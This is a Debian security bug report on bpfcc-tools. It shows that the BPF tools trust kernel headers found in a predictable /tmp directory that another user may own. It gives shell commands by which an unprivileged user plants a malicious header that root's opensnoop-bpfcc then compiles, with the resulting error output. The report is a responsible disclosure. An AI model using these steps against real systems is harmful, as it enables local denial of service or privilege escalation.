Package: bpfcc-tools Version: 0.25.0+ds-1 Tags: security
If kernel headers are not installed in the usual place, the BPF tools try to look them up in /tmp/kheaders-$(uname -r)/, even when this directory is owned by another user.
This can be exploited for denial of service, or likely something worse. To reproduce, run this as a normal user: $ mkdir /tmp/kheaders-$(uname -r)/ $ mkdir -p /tmp/kheaders-$(uname -r)/include/linux/ $ echo "#error this header is malicious" > /tmp/kheaders-$(uname -r)/include/linux/kconfig.h Then run this as root: # opensnoop-bpfcc In file included from <built-in>:1: ././include/linux/kconfig.h:1:2: error: this header is malicious #error this header is malicious ^ In file included from <built-in>:2: /virtual/include/bcc/bpf.h:12:10: fatal error: 'linux/types.h' file not found #include <linux/types.h> ^~~~~~~~~~~~~~~ 2 errors generated. Traceback (most recent call last): File "/usr/sbin/opensnoop-bpfcc", line 261, in <module> b = BPF(text='') ^^^^^^^^^^^^ File "/usr/lib/python3/dist-packages/bcc/__init__.py", line 476, in __init__ raise Exception("Failed to compile BPF module %s" % (src_file or "<text>")) Exception: Failed to compile BPF module <text> -- System Information: Debian Release: bookworm/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: amd64 (x86_64) Kernel: Linux 6.1.0-1-amd64 (SMP w/1 CPU thread; PREEMPT) Locale: LANG=C.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8), LANGUAGE not set Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled Versions of packages bpfcc-tools depends on: ii python3 3.11.1-1 ii python3-bpfcc 0.25.0+ds-1 ii python3-netaddr 0.8.0-2 -- Jakub Wilk